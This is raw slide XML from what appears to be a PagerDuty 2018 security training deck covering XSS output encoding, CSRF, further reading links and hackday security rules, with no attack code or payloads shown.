        <p:spPr>
          <a:xfrm>
            <a:off x="20225611" y="59665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HAML</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1568" name="https://rorsecurity.info/portfolio/xss-protection-in-haml-templates"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051818" y="12544209"/>
            <a:ext cx="22381964" cy="44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000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr u="none"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://rorsecurity.info/portfolio/xss-protection-in-haml-templates</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1569" name="info-white.png" descr="info-white.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="735727" y="12616767"/>
            <a:ext cx="309895" cy="309894"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1572" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4261426" y="9136878"/>
            <a:ext cx="2025806" cy="2025806"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2025805" cy="2025805"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1570" name="Circle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="2025806" cy="2025806"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="25C151"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="1571" name="✔"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="448583" y="363615"/>
              <a:ext cx="1230239" cy="1400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spcBef>
                  <a:spcPts val="5900"/>
                </a:spcBef>
                <a:defRPr sz="10000">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>✔</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1575" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4261426" y="5304630"/>
            <a:ext cx="2025806" cy="2346403"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2025805" cy="2346402"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1573" name="Circle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="2025806" cy="2025806"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="C62818"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="1574" name="!"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="699657" y="107640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spcBef>
                  <a:spcPts val="5900"/>
                </a:spcBef>
                <a:defRPr b="1" sz="13000">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mj-ea"/>
                  <a:cs typeface="+mj-cs"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>!</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:gr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9"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580"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581" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1582" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1583" name="User supplied data should always be encoded when output."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>User supplied data should always be encoded when output.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1584" name="KEY TAKEAWAY"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20250661" y="358292"/>
            <a:ext cx="3717418" cy="735952"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13906"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="25C15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KEY TAKEAWAY</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8" name="Not Just HTML…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Not Just HTML…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1589" name="HTML Comments.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="543277" indent="-543277" defTabSz="722947">
              <a:spcBef>
                <a:spcPts val="5100"/>
              </a:spcBef>
              <a:defRPr sz="5104"/>
            </a:pPr>
            <a:r>
              <a:t>HTML Comments.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="543277" indent="-543277" defTabSz="722947">
              <a:spcBef>
                <a:spcPts val="5100"/>
              </a:spcBef>
              <a:defRPr sz="5104"/>
            </a:pPr>
            <a:r>
              <a:t>HTML Common Attributes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="543277" indent="-543277" defTabSz="722947">
              <a:spcBef>
                <a:spcPts val="5100"/>
              </a:spcBef>
              <a:defRPr sz="5104"/>
            </a:pPr>
            <a:r>
              <a:t>JavaScript Data Values.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="543277" indent="-543277" defTabSz="722947">
              <a:spcBef>
                <a:spcPts val="5100"/>
              </a:spcBef>
              <a:defRPr sz="5104"/>
            </a:pPr>
            <a:r>
              <a:t>HTML Style Property Values.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="543277" indent="-543277" defTabSz="722947">
              <a:spcBef>
                <a:spcPts val="5100"/>
              </a:spcBef>
              <a:defRPr sz="5104"/>
            </a:pPr>
            <a:r>
              <a:t>HTML URL Parameter Values.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="543277" indent="-543277" defTabSz="722947">
              <a:spcBef>
                <a:spcPts val="5100"/>
              </a:spcBef>
              <a:defRPr sz="5104"/>
            </a:pPr>
            <a:r>
              <a:t>…Basically everything.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1590"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59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592" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1593"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fast"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97"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598"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599" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1600" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1601" name="Use a Library for Encoding"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Use a Library for Encoding</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1602" name="KEY TAKEAWAY"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20250661" y="358292"/>
            <a:ext cx="3717418" cy="735952"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13906"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="25C15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KEY TAKEAWAY</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6" name="Additional Reading"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>          Additional Reading</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1607" name="https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="996553" y="4389304"/>
            <a:ext cx="22390894" cy="7469321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="617361" indent="-617361"/>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId3" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="617361" indent="-617361"/>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId4" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://developers.google.com/web/fundamentals/security/csp/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="617361" indent="-617361"/>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId5" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/Content_Security_Policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1608" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="pic" idx="21"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="743302" y="12987118"/>
            <a:ext cx="1691863" cy="324838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160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610" name="PUBLIC"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>PUBLIC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1611" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1612" name="book (1).png" descr="book (1).png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="711200" y="946811"/>
            <a:ext cx="3036094" cy="3036095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast"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16" name="PagerDuty_logo_GREEN.png" descr="PagerDuty_logo_GREEN.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617"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618" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1619" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1620" name="CSRF"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="869950" y="4536281"/>
            <a:ext cx="22644099" cy="464343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gn="l">
              <a:defRPr sz="11200">
                <a:solidFill>
                  <a:srgbClr val="353535"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1621" name="mustache-glasses.png" descr="mustache-glasses.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10701099" y="1635324"/>
            <a:ext cx="12329264" cy="10445352"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">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25" name="fry-suspicious.jpg" descr="fry-suspicious.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="20000"/>
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-14817" y="-1511631"/>
            <a:ext cx="24413635" cy="15258522"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1626" name="Tricking a user into performing an action they didn’t want."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Tricking a user into performing an action they didn’t want.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1627"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1628"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629" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1630" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1631" name="DEFINITION"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20250661" y="358292"/>
            <a:ext cx="3717418" cy="735952"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13906"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3F7CA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DEFINITION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast"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Hackday Security"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Hackday Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="316" name="Just because it’s a Hackday, doesn’t mean you can ignore the rules.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Just because it’s a Hackday, doesn’t mean you can ignore the rules.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Don’t change firewall or disable security settings because “it’s quicker”. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Don’t use a public repo to build your Hackday.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Don’t use customer data for Hackdays.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="317"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318"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319" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="320"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35" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="15000"/>
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-19610" y="-2182357"/>
            <a:ext cx="24423220" cy="16267763"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1636" name="Let’s pretend to be an attacker."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Let’s pretend to be an attacker.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1637" name="PagerDuty_logo_WHITE.png" descr="PagerDuty_logo_WHITE.png"/>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1638"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639" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1640" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1641" name="hacker-icon.png" descr="hacker-icon.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10070107" y="8064759"/>
            <a:ext cx="4243726" cy="4243726"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast"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5" name="PagerDuty_logo_GREEN.png" descr="PagerDuty_logo_GREEN.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646"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647" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
